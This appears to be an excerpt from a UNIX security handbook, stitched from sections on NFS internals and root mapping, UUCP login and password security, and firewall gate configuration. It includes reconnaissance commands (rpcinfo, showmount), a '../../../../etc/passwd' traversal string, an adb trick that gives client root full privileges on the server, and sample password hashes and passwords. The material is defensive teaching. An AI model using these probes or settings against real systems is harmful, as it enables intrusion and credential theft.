Under <strong>UNIX</strong>, a file handle consists of at least three important elements: the filesystem identifier, the file<br />

identifier, and a generation count. The file identifier can be something as simple as an inode number to<br />

refer to a particular item on a partition. The filesystem identifier refers to the partition containing the file<br />

(inode numbers are unique per partition, but not per system). The file handle doesn't include a pathname;<br />

a pathname is not necessary and is in fact subject to change while a file is being accessed.<br />

The generation count is a number that is incremented each time a file is unlinked and recreated. The<br />

generation count ensures that when a client references a file on the server, that file is in fact the same file<br />

that the server thinks it is. Without a generation count, two clients accessing the same file on the server<br />

could produce erroneous results if one client deleted the file and created a new file with the same inode<br />

number. The generation count prevents such situations from occurring: when the file is recreated, the<br />

generation number is incremented, and the second client gets an error message when it attempts to access<br />

the older, now nonexistent, file.<br />

Which Is Better: Stale Handles or Stale Love?<br />

To better understand the role of the generation count, imagine a situation in which you are writing a<br />

steamy love letter to a colleague with whom you are having a clandestine affair. You start by opening a<br />

new editor file on your workstation. Unbeknownst to you, your editor puts the file in the /tmp directory,<br />

which happens to be on the NFS server. The server allocates an inode from the free list on that partition,<br />

constructs a file handle for the new file, and sends the file handle to your workstation (the client). You<br />

begin editing the file. "My darling chickadee, I remember last Thursday in your office," you start to<br />

write, only to be interrupted by a long phone call.<br />


You aren't aware of it, but as you are talking on the phone, there is a power flicker in the main computer<br />

room, and the server crashes and reboots. As part of the reboot, the temporary file for your mailer is<br />

deleted along with everything else in the /tmp directory, and its inode is added back to the free list on the<br />

server. While you are still talking on the phone, your manager starts to compose a letter to the president<br />

of the company, recommending a raise and promotion for you. He also opens a file in the /tmp directory,<br />

and his diskless workstation is allocated a file handle for the same inode that you were using (it is free<br />

now, after all)!<br />

You finally finish your call and return to your letter. Of course, you notice nothing out of the ordinary<br />

because of the stateless nature of NFS. You put the finishing touches on your letter, "... and I can't wait<br />

until this weekend; my wife suspects nothing!" and save it. Your manager finishes his letter at the same<br />

moment: "... as a reward for his hard work and serious attitude, I recommend a 50% raise." Your<br />

manager and you hit the "send" key simultaneously.<br />

Without a generation count, the results might be less than amusing. The object of your affection could<br />

get a letter about you deserving a raise. Or, your manager's boss could get a letter concerning a midday<br />

dalliance on the desktop. Or, both recipients might get a mixture of the two versions, with each version<br />

containing one file record from one file and one from another. The problem is that the system can't<br />

distinguish the two files because the file handles are the same.<br />

This sort of thing occasionally happened before Sun got the generation-count code working properly and<br />

consistently. With the generation-count software working as it should, you would instead get an error<br />

message stating "Stale NFS File Handle" when you try to access the (now deleted) file. That's because<br />

the server increments the generation count value in the inode when the inode is returned to the free list.<br />

Later, whenever the server receives a request from a client that has a valid file handle except for the<br />

generation count, the server rejects the operation and returns an error.<br />

NOTE: Some NFS servers ignore the generation count in the file handle. These versions of<br />

NFS are considerably less secure, as they enable an attacker to easily create valid file<br />

handles for directories on the server.<br />

20.1.3 MOUNT Protocol

The MOUNT protocol is used for the initial negotiation between the NFS client and the NFS server. Using MOUNT, a client can determine which filesystems are available for mounting and can obtain a token (the file handle) which is used to access the root directory of a particular filesystem. After that file handle is returned, it can thereafter be used to retrieve file handles for other directories and files on the server.

Another benefit of the MOUNT protocol is that you can export only a portion of a local partition to a remote client. By specifying that the root is a directory on the partition, the MOUNT service will return its file handle to the client. To the client, this file handle behaves exactly as one for the root of a partition: reads, writes, and directory lookups all behave the same way.

MOUNT is an RPC service. The service is provided by the mountd or rpc.mountd daemon, which is started automatically at boot. (On Solaris 2.x systems, for example, mountd is located in /usr/lib/nfs/mountd, and is started by the startup script /etc/rc3.d/S15nfs.server.) MOUNT is often given the RPC program number 100,005. The standard mountd can respond to seven different requests:

NULL Does nothing.
MNT Returns a file handle for a filesystem. Advises the mount daemon that a client has mounted the filesystem.
DUMP Returns the list of mounted filesystems.
UMNT Removes the mount entry for this client for a particular filesystem.
UMNTALL Removes all mount entries for this client.
EXPORT Returns the server's export list to the client.

Although the MOUNT protocol provides useful information within an organization, the information that it provides could be used by those outside an organization to launch an attack. For this reason, you should prevent people outside your organization from accessing your computer's mount daemon. Two ways of providing this protection are via the portmapper wrapper, and via an organizational firewall. See Chapter 22, Wrappers and Proxies, and Chapter 21, Firewalls, for further information.
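You can see exactly what an outsider would learn by querying your own server. Both of the following commands are standard on most UNIX systems; zeus is a placeholder for your server's hostname:

# Ask the portmapper which RPC services (mountd, nfs, and so on) the
# server is offering, and on which ports:
rpcinfo -p zeus

# Ask the mount daemon for the server's export list - the same EXPORT
# request that an attacker outside your organization could make:
showmount -e zeus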

The MOUNT protocol is based on Sun Microsystems' Remote Procedure Call (RPC) and External Data Representation (XDR) protocols. For a complete description of the MOUNT protocol, see RFC 1094.

20.1.4 NFS Protocol

The NFS protocol takes over where the MOUNT protocol leaves off. With the NFS protocol, a client can list the contents of an exported filesystem's directories; obtain file handles for other directories and files; and even create, read, or modify files (as permitted by UNIX permissions).

Here is a list of the RPC functions that perform operations on directories:

CREATE Creates (or truncates) a file in the directory
LINK Creates a hard link
LOOKUP Looks up a file in the directory
MKDIR Makes a directory
READDIR Reads the contents of a directory
REMOVE Removes a file in the directory
RENAME Renames a file in the directory
RMDIR Removes a directory
SYMLINK Creates a symbolic link

These RPC functions can be used with files:

GETATTR Gets a file's attributes (owner, length, etc.)
SETATTR Sets some of a file's attributes
READLINK Reads a symbolic link's path
READ Reads from a file
WRITE Writes to a file


NFS version 3 adds a number of additional RPC functions. With the exception of MKNOD3, these new<br />

functions simply allow improved performance:<br />

ACCESS Determines if a user has the permission to access a particular file or directory.<br />

FSINFO Returns static information about a filesystem.<br />

FSSTAT Returns dynamic information about a filesystem.<br />

MKNOD Creates a device or special file on the remote filesystem.<br />

READDIRPLUS Reads a directory and returns the file attributes for each entry in the directory.<br />

PATHCONF Returns the attributes of a file specified by pathname.<br />

COMMIT Commits the NFS write cache to disk.<br />

All communication between the NFS client and the NFS server is based upon Sun's RPC system, which<br />

lets programs running on one computer call subroutines that are executed on another. RPC uses Sun's<br />

XDR system to allow the exchange of information between different kinds of computers. For speed and<br />

simplicity, Sun built NFS upon the <strong>Internet</strong> User Datagram Protocol (UDP); however, NFS version 3<br />

allows the use of TCP, which actually improves performance over low-bandwidth, high-latency links<br />

such as modem-based PPP connections.<br />

20.1.4.1 How NFS creates a reliable filesystem from a best-effort protocol<br />

UDP is fast but only best-effort: "Best effort" means that the protocol does not guarantee that UDP<br />

packets transmitted will ever be delivered, or that they will be delivered in order. NFS works around this<br />

problem by requiring the NFS server to acknowledge every RPC command with a result code that<br />

indicates whether the command was successfully completed or not. If the NFS client does not get an<br />

acknowledgment within a certain amount of time, it retransmits the original command.<br />

If the NFS client does not receive an acknowledgment, then UDP lost either the original RPC command<br />

or the RPC acknowledgment. If the original RPC command was lost, there is no problem - the server sees<br />

it for the first time when it is retransmitted. But if the acknowledgment was lost, the server will actually<br />

get the same NFS command twice.<br />

For most NFS commands, this duplication of requests presents no problem. With READ, for example,<br />

the same block of data can be read once or a dozen times, without consequence. Even with the WRITE<br />

command, the same block of data can be written twice to the same point in the file, without<br />

consequence.[3]<br />

[3] This is precisely the reason that NFS does not have an atomic command for appending<br />

information to the end of a file.<br />

Other commands, however, cannot be executed twice in a row. MKDIR, for example, will fail the second<br />

time that it is executed because the requested directory will already exist. For commands that cannot be<br />

repeated, some NFS servers maintain a cache of the last few commands that were executed. When the<br />

server receives a MKDIR request, it first checks the cache to see if it has already received the MKDIR<br />

request. If so, the server merely retransmits the acknowledgment (which must have been lost).<br />

20.1.4.2 Hard, soft, and spongy mounts<br />


If the NFS client still receives no acknowledgment, it will retransmit the request again and again, each<br />

time doubling the time that it waits between retries. If the network filesystem was mounted with the soft<br />

option, the request will eventually time out. If the network filesystem is mounted with the hard option,<br />

the client continues sending the request until the client is rebooted or gets an acknowledgment. BSDI and<br />

OSF/1 also have a spongy option that is similar to hard, except that the stat, lookup, fsstat, readlink, and<br />

readdir operations behave like a soft MOUNT.<br />

Figure 20.1: NFS protocol stack<br />

NFS uses the mount command to specify if a filesystem is mounted with the hard or soft option. To<br />

mount a filesystem soft, specify the soft option. For example:<br />

/etc/mount -o soft zeus:/big /zbig<br />

This command mounts the directory /big stored on the server called zeus locally in the directory /zbig.<br />

The option -o soft tells the mount program that you wish the filesystem mounted soft.<br />

To mount a filesystem hard, do not specify the soft option:<br />

/etc/mount zeus:/big /zbig<br />

Deciding whether to mount a filesystem hard or soft can be difficult, because there are advantages and<br />

disadvantages to each option. Diskless workstations often hard-mount the directories that they use to<br />

keep system programs; if a server crashes, the workstations wait until the server is rebooted, then<br />

continue file access with no problem. Filesystems containing home directories are usually hard mounted,<br />

so that all disk writes to those filesystems will be correctly performed.<br />

On the other hand, if you mount many filesystems with the hard option, you will discover that your<br />

workstation may stop working every time any server crashes until it reboots. If there are many libraries<br />

and archives that you keep mounted on your system, but which are not critical, you may wish to mount<br />

them soft. You may also wish to specify the intr option, which is like the hard option except that the user<br />

can interrupt it by typing the kill character (usually control-C).<br />
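For example, to obtain the reliability of a hard mount while still being able to interrupt a hung access from the keyboard, you might combine the two options (using the same placeholder names as in the earlier examples):

# Hard mount with the intr option: requests are retried until the server
# responds, but a user can abort a hung access by typing the kill
# character (usually control-C).
/etc/mount -o hard,intr zeus:/big /zbig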

As a general rule of thumb, read-only filesystems can be mounted soft without any chance of accidental loss of data. But you will have problems if you try to run programs off partitions that are soft-mounted, because when you get errors, the program that you are running will crash.

An alternative to using soft mounts is to mount everything hard (or spongy, when available), but to avoid<br />

mounting your nonessential NFS partitions directly in the root directory. This practice will prevent the<br />

<strong>UNIX</strong> getpwd() function from hanging when a server is down.[4]<br />

[4] Hal Stern, in Managing NFS and NIS, says that any filesystem that is read-write or on<br />

which you are mounting executables should be mounted hard to avoid corruption. His<br />

analogy with a dodgy NFS server is that hard mount behaves like a slow drive, while soft<br />

mount behaves like a broken drive!<br />

20.1.4.3 Connectionless and stateless<br />

As we've mentioned, NFS servers are stateless by design. Stateless means that all of the information that<br />

the client needs to mount a remote filesystem is kept on the client, instead of having additional<br />

information with the mount stored on the server. After a file handle is issued for a file, that file handle<br />

will remain good even if the server is shut down and rebooted, as long as the file continues to exist and as<br />

long as no major changes are made to the configuration of the server that would change the values (e.g., a<br />

file system rebuild or restore from tape).<br />

Early NFS servers were also connectionless. Connectionless means that the server program does not keep<br />

track of every client that has remotely mounted the filesystem.[5] When offering NFS over a TCP<br />

connection, however, NFS is not connectionless: there is one TCP connection for each mounted<br />

filesystem.<br />

[5] An NFS server computer does keep track of clients that mount their filesystems<br />

remotely. The /usr/etc/rpc.mountd program maintains this database; however, a computer<br />

that is not in this database can still access the server's filesystem even if it is not registered in<br />

the rpc.mountd database.<br />

The advantage of a stateless, connectionless system is that such systems are easier to write and debug.<br />

The programmer does not need to write any code for reestablishing connections after the network server<br />

crashes and restarts, because there is no connection that must be reestablished. If a client should crash (or<br />

if the network should become disconnected), valuable resources are not tied up on the server maintaining<br />

a connection and state for that client.<br />

A second advantage of this approach is that it scales. That is, a connectionless, stateless NFS server<br />

works equally well if ten clients are using a filesystem or if ten thousand are using it. Although system<br />

performance suffers under extremely heavy use, every file request made by a client using NFS will<br />

eventually be satisfied, and there is absolutely no performance penalty if a client mounts a filesystem but<br />

never uses it.<br />

20.1.4.4 NFS and root

Because the superuser can do so much damage on the typical UNIX system, NFS takes special precautions in the way that it handles the superuser running on client computers.

Instead of giving the client superuser unlimited privileges on the NFS server, NFS gives the superuser on the clients virtually no privileges: the superuser gets mapped to the UID of the nobody user - usually a UID of 32767 or 60001 (although occasionally -1 or -2 on pre-POSIX systems).[6] Some versions of NFS allow you to specify the UID to which to map root's accesses, with the UID of the nobody user as the default.

[6] The <strong>UNIX</strong> kernel maps accesses from client superusers to the kernel variable nobody,<br />

which is set to different values on different systems. Historically, the value of nobody was<br />

-1, although Solaris defines nobody to be 60001. You can change this value to 0 through the<br />

use of adb, making all superuser requests automatically be treated as superuser on the NFS<br />

server. In the immortal words of Ian D. Horswill, "The Sun kernel has a user-patchable<br />

cosmology. It contains a polytheism bit called `nobody.'...The default corresponds to a<br />

basically Greek pantheon in which there are many Gods and they're all trying to screw each<br />

other (both literally and figuratively in the Greek case). However, by using adb to set the<br />

kernel variable nobody to 0 in the divine boot image, you can move to a Ba'hai cosmology<br />

in which all Gods are really manifestations of the One Root God, Zero, thus inventing<br />

monotheism." (The <strong>UNIX</strong>-Haters Handbook, Garfinkel et al. IDG Books, 1994. p. 291)<br />

Thus, superusers on NFS client machines actually have fewer privileges (with respect to the NFS server)<br />

than ordinary users. However, this lack of privilege isn't usually much of a problem for would-be<br />

attackers who have root access, because the superuser can simply su to a different UID such as bin or<br />

sys. On the other hand, treating the superuser in this way can protect other files on the NFS server.<br />

NFS does no remapping of any other UID, nor does it do any remapping of any GID values. Thus, if a<br />

server exports any file or directory with access permissions for some user or group, the superuser on a<br />

client machine can take on an identity to access that information. This rule implies that the exported file<br />

can be read or copied by someone remote, or worse, modified without authorization.<br />
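Whether a particular client's root keeps its privileges is decided on the server when the filesystem is exported. The syntax is vendor-specific; the lines below are only a sketch in the SunOS-style /etc/exports format, with client1, client2, and trusted1 as placeholder hostnames (see the exports manual page on your system):

# /etc/exports (SunOS-style syntax; details vary by vendor)
# No -root= option: root on the clients is mapped to nobody here.
/export/home  -access=client1:client2
# root on the host trusted1 keeps its privileges on its own root partition.
/export/root/trusted1  -root=trusted1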

20.1.5 NFS Version 3

During the ten years of the life of NFS Version 2, a number of problems were discovered with it. These problems included:

● NFS was originally based on AUTH_UNIX RPC security. As such, it provided almost no protection against spoofing. AUTH_UNIX simply used the stated UID and GID of the client user to determine access.

● The packets transmitted by NFS were not encrypted, and were thus open to eavesdropping, alteration, or forging on a network.

● NFS had no provisions for files larger than 4GB. This was not a problem in 1985, but many UNIX users now have bigger disks and bigger files.

● NFS suffered serious performance problems on high-speed networks because of the maximum 8K data-size limitation on READ and WRITE procedures, and because of the need to separately request the file attributes on each file when a directory was read.

NFS 3 is the first major revision to NFS since the protocol was commercially released. As such, NFS 3 was designed to correct many of the problems that had been experienced with NFS. But NFS 3 is not a total rewrite. According to Pawlowski et al., there were three guiding principles in designing NFS 3:


1. Keep it simple.<br />

2. Get it done in a year.<br />

3. Avoid anything controversial.<br />

Thus, while NFS 3 allows for improved performance and access to files larger than 4GB, it does not<br />

make any fundamental changes to the overall NFS architecture.<br />

As a result of the design criteria, there are relatively few changes between the NFS 2 and 3 protocols:<br />

● File-handle size has been increased from a fixed-length 32-byte block of data to a variable-length array with a maximum length of 64 bytes.<br />

● The maximum size of data that can be transferred using READ and WRITE procedures is now determined dynamically by the values returned by the FSINFO function. The maximum lengths for filenames and pathnames are now similarly specified.<br />

● File lengths and offsets have been extended from four bytes to eight bytes.[7]<br />

[7] Future versions of NFS - or any other filesystem - will not likely need to use more than eight bytes to represent the size of a file: eight bytes can represent more than 1.7 x 10^13 MB of storage.<br />

● RPC errors can now return data (such as file attributes) in addition to return codes.<br />

● Additional file types are now supported for character- and block-device files, sockets, and FIFOs.<br />

● An ACCESS procedure has been added to allow an NFS client to explicitly check to see if a particular user can or cannot access a file.<br />

Because RPC allows a server to respond to more than one version of a protocol at the same time, NFS 3<br />

servers will be able to support the NFS 2 and 3 protocols simultaneously, so that they can serve older<br />

NFS 2 clients while allowing easy upgradability to NFS 3. Likewise, most NFS 3 clients will continue to<br />

support the NFS 2 protocol as well, so that they can speak with old servers and new ones.<br />

This need for backward compatibility effectively prevented the NFS 3 designers from adding new<br />

security features to the protocols. If NFS 3 had more security features, an attacker could avoid them by<br />

resorting to NFS 2. On the other hand, by changing from unsecure RPC to Secure RPC, a site can<br />

achieve secure NFS for all of its NFS clients and servers, whether they are running NFS 2 or NFS 3.<br />

NOTE: If and when your system supports NFS over TCP links, you should configure it to<br />

use TCP and not UDP unless there are significant performance reasons for not doing so.<br />

TCP-based service is more immune to denial of service problems, spoofed requests, and<br />

several other potential problems inherent in the current use of UDP packets.<br />


Chapter 15<br />

UUCP<br />

15.3 UUCP and <strong>Sec</strong>urity<br />

Any system that allows files to be copied from computer to computer and allows commands to be remotely executed raises a<br />

number of security concerns. What mechanisms exist to prevent unauthorized use? What prevents an attacker from using the<br />

system to gain unauthorized entry? What prevents an attacker from reverse engineering the system to capture confidential<br />

information? Fortunately, UUCP has many security measures built into it to minimize the dangers posed by its capabilities. For<br />

example:<br />

● The uucico program must log into your system to transfer files or run commands. By assigning a password to the uucp account, you can prevent unauthorized users from logging in.<br />

● The UUCP programs run SUID uucp, not SUID root. Other than being able to read the spooled UUCP files, the uucp user doesn't have any special privileges. It can read only files that are owned by uucp or that are readable by everybody on the system; likewise, it can create files only in directories that are owned by uucp or in directories that are world writable.<br />

● The UUCP login does not receive a normal shell, but instead invokes another copy of uucico. The only functions that can be performed by this copy of uucico are those specified by the system administrator.<br />

As system administrator, you have a few more tools for controlling the level of security:<br />

● You can create additional /etc/passwd entries for each system that calls your machine, allowing you to grant different privileges and access to different remote computers.<br />

● You can configure UUCP so remote systems can retrieve files only from particular directories. Alternatively, you can turn off remote file retrieval altogether.<br />

● You can require callback for certain systems, so you can be reasonably sure that the UUCP system you are communicating with is not an impostor.<br />

But even with these protective mechanisms, UUCP can compromise system security if it is not properly installed. And once<br />

one system is compromised, it can be used to compromise others, because UUCP passwords are stored unencrypted.<br />

NOTE: If you run an NFS server on the same computer that you use for UUCP, the NFS server must not export<br />

the UUCP configuration, program, or data directories. This is because the UUCP files are owned by the uucp user,<br />

not by the user root. In standard NFS, only files owned by root are protected. Thus, an attacker could use NFS to<br />

modify the UUCP files on your system, and use that modification as a means for gaining further access.<br />

15.3.1 Assigning Additional UUCP Logins<br />

Most Berkeley <strong>UNIX</strong> systems come with two UUCP logins. The first is used by computers that call and exchange information<br />

using uucico:<br />

uucp:Ab1zDIdS2/JCQ:4:4:Mr. UUCP:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

The second UUCP login, usually called uucpa or nuucp, has a regular shell as its login shell. It is used for administration. (The<br />

"a" stands for "administrator.")<br />

uucp:Ab1zDIdS2/JCQ:4:4:Mr. UUCP:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

uucpa:3jd912JFK31fa:4:4:UUCP Admin:/usr/lib/uucp/:/bin/csh<br />


(System V systems usually use the account name uucp as the administrative login and nuucp as the uucico login.)<br />

These two logins are all that you need to use UUCP. Every machine that calls you uses the same uucp login. In most cases,<br />

every machine will be granted the same type of access on your machine.<br />

Alternatively, you may wish to assign a different login to each machine that calls you. This lets you grant different classes of<br />

access to each machine, and gives you a lot more control over each one.<br />

For example, if you are called by the machines garp, idr, and prose, you might want to have a separate login for each of these<br />

machines[6]:<br />

[6] Many system administrators capitalize the "U" at the beginning of dedicated UUCP login names. This notation<br />

helps to distinguish the login names from usernames that might begin with a lower-case "u" (e.g., ursula and<br />

ulrich). Furthermore, some software uses this convention to trigger special behavior - such as mgetty in Linux,<br />

which will switch to uucico instead of login. Reliance on such naming is a questionable design from a security<br />

point of view, but we do note the convention.<br />

uucp:asXN3sQefHsh:4:4:Mr. UUCP:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

Ugarp:ddGw1opxMz1MQ:4:4:UUCP Login for garp:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

Uprose:777uf2KOKdbkY:4:4:UUCP Login for prose:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

Uidr:asv.nbgMNy/cA:4:4:UUCP Login for idr:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

The only differences between these logins are their usernames, passwords, and full names; the UIDs, home directories, and<br />

shells all remain the same. Having separate UUCP logins lets you use the last and finger commands to monitor who is calling<br />

you. Separate logins also make the task of tracing security leaks easier: for example, spotting one machine that dials in with one username<br />

and password but pretends to be another. Furthermore, if you decide that you no longer want a UUCP link with a particular<br />

system, you can shut off access to that site by changing the password of one of the UUCP logins without affecting other<br />

systems.<br />

If you have many UUCP connections within your organization and only a few to the outside, you may wish to compromise by<br />

having one UUCP login for your local connections and separate UUCP logins for all of the systems that dial in from outside.<br />

15.3.2 Establishing UUCP Passwords<br />

Many <strong>UNIX</strong> systems come without passwords for their UUCP accounts; be sure to establish passwords for these accounts<br />

immediately, whether or not you intend to use UUCP.<br />

Because the shell for UUCP accounts is uucico (rather than sh, ksh, or csh), you can't set the passwords for these accounts by<br />

su-ing to them and then using the passwd command. If you do, you'll get a copy of uucico as your shell, and you won't be able<br />

to type sensible commands. Instead, to set the password for the UUCP account, you must become the superuser and use the<br />

passwd command with its optional argument - the name of the account whose password you are changing. For example:<br />

% /bin/su<br />

password: bigtime! Superuser password<br />

# passwd uucp<br />

New password: longcat! New password for the uucp account<br />

Re-enter new password: longcat!<br />

15.3.3 <strong>Sec</strong>urity of L.sys and Systems Files<br />

Because it logs in to remote systems, uucico has to keep track of the names, telephone numbers, account names, and passwords<br />

it uses to log into these machines. This information is kept in a special file called /usr/lib/uucp/L.sys (in Version 2) or<br />

/usr/lib/uucp/Systems (in BNU).<br />

The information in the L.sys or Systems file can easily be misused. For example, somebody who has access to this file can<br />

program his or her computer to log into one of the machines that you exchange mail with, pretending to be your machine, and<br />

in this way get all of your electronic mail!<br />


To protect the L.sys or Systems file, make sure that the file is owned by the uucp user and is mode 400 or 600 - that is,<br />

unreadable to anybody but UUCP.<br />
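For example, as the superuser (assuming the usual /usr/lib/uucp location; substitute Systems for L.sys on BNU systems):<br />

# chown uucp /usr/lib/uucp/L.sys<br />
# chmod 400 /usr/lib/uucp/L.sys<br />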

You should check to make sure that there is no way to read or copy your L.sys or Systems file by using the uucp program. You<br />

should also make sure that the uucp program does not allow people on remote machines to retrieve your /etc/passwd file when<br />

they specify pathnames such as "../../../../etc/passwd."<br />

NOTE: When debugging a UUCP connection to a remote site, you may wish to run the uucico command in debug<br />

mode. When you do so, the command prints a running account of the data exchanged with the remote machine. On<br />

most systems, if you do this as root (or as a user with read permission on the L.sys or Systems file, e.g., a user in<br />

group uucp), then the debug text will include the telephone number, account name, and possibly the password(s)<br />

of the remote site. Thus, run in debug mode as a non-privileged user, or in a secured location to prevent someone<br />

from snooping.<br />


Chapter 21<br />

Firewalls<br />

21.4 Setting Up the Gate<br />

The gate machine is the other half of the firewall. The choke forces all communication between the<br />

inside network and the outside network to take place through the gate; the gate enforces security,<br />

authenticating users, sanitizing data (if necessary), and passing it along.<br />

The gate should have a very stripped-down version of some operating system. It should have no<br />

compiler, for example, to prevent attackers from compiling programs on it. It should have no regular user<br />

accounts, to limit the places where an attacker can enter.<br />

You concentrate a great deal of your security effort on setting up and maintaining the gate. Usually, the<br />

gate will act as your mail server, your Usenet server (if you support news), and your anonymous FTP<br />

repository (if you maintain one).[9] It should not be your file server. We'll discuss how you configure<br />

each of these services, and then how to protect the gate.<br />

[9] We advise against putting your anonymous FTP repository on your firewall. However, if<br />

your resources are really so limited that you can't obtain another machine, and if you<br />

absolutely must have FTP enabled, this is the way to do it.<br />

For these examples, we use a hypothetical domain called company.com. We've named the gate machine<br />

keeper.company.com and an internal user machine office.company.com.<br />

21.4.1 Name Service<br />

Either the choke or the gate must provide <strong>Internet</strong> Domain Name Service (DNS) to the outside network<br />

for the company.com domain. Usually, you will do this by running the Berkeley name server (BIND) on<br />

one of these machines.[10]<br />

[10] There are many nuances to configuring your DNS service in a firewall situation. We<br />

recommend you see DNS and BIND by Albitz and Liu, and Building <strong>Internet</strong> Firewalls by<br />

Chapman and Zwicky, both published by <strong>O'Reilly</strong> & Associates.<br />

Occasionally, the names of computers on your internal network will be sent outside; your name server<br />

should be set up so that when people on the outside try to send mail back to the internal computers, the<br />

mail is sent to the gate instead. The simplest way to set up this configuration is with a name server MX<br />

record. An MX record causes electronic mail destined for one machine to actually be sent to another.<br />

Configure your name server on the gate so that there is a wildcard MX record that<br />


specifies all of the hosts within your domain.<br />

For example, this rule specifies that any mail for inside the company.com domain is to go to keeper:<br />

*.company.com. IN MX 20 KEEPER.COMPANY.COM.<br />

In this manner, people on the outside network will be able to reply to any electronic mail that "escapes"<br />

with an internal name. (Be advised that a specific A record will outweigh a wildcard MX record. Thus, if<br />

you have an A record for an internal machine, you will also need to have an MX record for that machine<br />

so that the computer's email is properly sent to your mail server.)<br />
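For instance, a fragment of the company.com zone data might look like the following sketch (the address is purely illustrative):<br />

*.company.com.      IN MX 20 KEEPER.COMPANY.COM.<br />
office.company.com. IN A     192.168.7.5<br />
office.company.com. IN MX 20 KEEPER.COMPANY.COM.<br />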

21.4.2 Electronic Mail<br />

Configure the gate so all outgoing mail appears to come from the gate machine; that is:<br />

● All mail messages sent from the inside network must have the To:, From:, Cc:, Sender:, Reply-To:, and Errors-To: fields of their headers rewritten so an address in the form user@office.company.com is translated to the form user@company.com.<br />

● Because all mail from the outside is sent through the gate, the gate must have a full set of mail aliases to allow mail to be redirected to the appropriate internal site and user.<br />

● The internal machines, like office, must have their mailers configured so that all mail not destined for an internal machine (i.e., anything not to a company.com machine) is sent to the gate, where the message's headers will be rewritten and then forwarded through the choke to the external network.<br />

● All UUCP mail must be run from the gate machine. All outgoing UUCP messages must have their return paths rewritten from company!office!user to company!user.<br />

There are many advantages to configuring your mail system with a central "post office":<br />

● Only one machine needs to have a complex mailer configuration.<br />

● Only one machine needs to handle automatic UUCP path routing.<br />

● Only one machine needs to have a complete set of user aliases visible to the outside.<br />

● If a user changes the name of his or her computer, that change needs to be made only on the gate machine. Nobody in the outside world, including electronic correspondents, needs to update his or her information; the change can easily be installed by the administrator at the gate machine.<br />

● You can more easily use complete aliases on your user accounts: all mail off-site can have firstname_lastname in its mail header.<br />

● If a user leaves the organization and needs to have his or her mail forwarded, mail forwarding can be done on the gate machine. This eliminates the need to leave old accounts in place simply to allow a .forward file to point to the person's new address.<br />


21.4.3 Netnews<br />

Configure news so the gate machine is the main news machine in the organization:<br />

● All outgoing articles must have the Path: and From: lines set to show only the gate machine. This setup is not difficult to do if the news is present only on the gate machine - standard news software provides defines in the configuration file to build the headers this way.<br />

● Internally, news can be read with NNTP and rrn, trn, nn, xrn, etc.<br />

● Alternatively, the news spool directory (usually /usr/spool/news) can be exported read-only by the gate machine to the internal machines. Posting internally would still be via NNTP and inews.<br />

Again, there are advantages to this configuration beyond the security considerations. One benefit is that<br />

news is maintained on a central machine, thus simplifying maintenance and storage considerations.<br />

Furthermore, you can regulate local-only groups because the gate machine can be set to prevent local<br />

groups from being sent outside. The administrator can also regulate which internal machines are allowed<br />

to read and post news.<br />

21.4.4 FTP<br />

If you wish to support anonymous FTP from the outside network, make sure the ~ftp/pub directory<br />

resides on the gate machine. (See Chapter 17, for information about how to set up anonymous FTP.)<br />

Internal users can access the ~ftp/pub directory via a read-only NFS partition. By leaving files in this<br />

directory, internal users can make their files available to users on the outside. Users from the outside use<br />

FTP to connect to the gate computer to read and write files. Alternatively, you may wish to make these<br />

directories available only to selected internal machines to help control which users are allowed to export<br />

files.[11]<br />

[11] Note that running NFS on the gate just for FTP access is dangerous and we do not<br />

recommend it.<br />

The best way to give internal users the ability to use FTP to transfer files from remote sites is to use<br />

proxies or wrappers. This approach is more secure and easier to configure. Proxies are readily available;<br />

consider using the TIS Firewall Toolkit (see Appendix E, Electronic Resources for ways to obtain it), or<br />

SOCKS (described in Chapter 22). You will need to have an FTP client program that understands<br />

proxies. Fortunately, the FTP clients in many World Wide Web browsers already do so. They are also<br />

considerably easier to use than the standard <strong>UNIX</strong> FTP client.<br />

21.4.4.1 Creating an ftpout account to allow FTP without proxies<br />

Another way that you can pass FTP through a firewall without using proxies is to create a special account<br />

on the gate machine named ftpout. Internal users connect via Telnet or rlogin to the gate and log in as<br />

ftpout. Only logins from internal machines should be allowed to this account.<br />

The ftpout account is not a regular account. Instead, it is a special account constructed for the purpose of<br />

using the ftp program. If you want added security, you can even set this account shell to be the<br />

/usr/ucb/ftp program.[12] When local users wish to transfer files from the outside, they will rlogin to the<br />


ftpout account on the gate, use ftp to transfer the files to the gate, log out of the gate computer, and then<br />

use a read-only NFS partition to read the files from the gate. The ftpout account should have a UID that<br />

is different from every other user on the system - including the ftp user.<br />

[12] Because the account has /usr/ucb/ftp as its shell, the FTP program's shell escape (!) will<br />

not work properly. This prevents the ftpout account from being used for other purposes.<br />

The ftpout strategy is less secure than using proxies. It allows users to view files that are brought in by<br />

FTP by other users. It also requires the cooperation of your users to manage the disk space on the gate<br />

machine. Nevertheless, it is a serviceable strategy if you cannot implement FTP proxies.<br />

There are a number of different ways in which you can protect the ftpout account from unauthorized use.<br />

One simple approach follows:<br />

1. Create the ftpout account on the gate with an asterisk (*) for a password (doing so prevents logins).<br />

2. Make the ftpout account's home directory owned by root, mode 755.<br />

3. Create a file ~ftpout/.rhosts, owned by root, that contains a list of the local users who are allowed to use the ftpout service.<br />

Legitimate users can now use the ftpout service by issuing the rlogin command:<br />

% rlogin gate -l ftpout<br />

The ftpout account must log all uses (via syslog, console prints, or similar means). It must then run the<br />

ftp program to allow the user to connect out to remote machines and transfer files locally to the gate.<br />

Using the ftpout account is a cumbersome, two-stage process. To transfer files from the outside network to<br />

the inside network, your users must follow these steps:<br />

1. Log into the ftpout account on the gate.<br />

2. Use the ftp command to transfer files from the outside computer to the gate.<br />

3. Log out of the ftpout account.<br />

4. Connect to the gate computer using the ftp command from the user's own machine.<br />

5. Transfer the files from the gate to the user's personal workstation.<br />

6. Delete the files on the gate.<br />

Transferring files from internal machines to machines on the other side of the firewall requires a similar<br />

roundabout process.<br />

The advantage of the ftpout system is that it allows users to import or export files, but it never makes a<br />

continuous FTP connection between internal and external machines. The configuration also has the<br />

advantage that it lets you keep a central repository of documents transferred via FTP, possibly with disk<br />

quotas. This configuration saves on storage. (Be advised, though, that all users of the ftpout account will<br />

share the same quota. You may wish to install a cron job that automatically deletes all files in the ftpout<br />

directory that have not been accessed in more than some interval, such as 90 minutes.)<br />
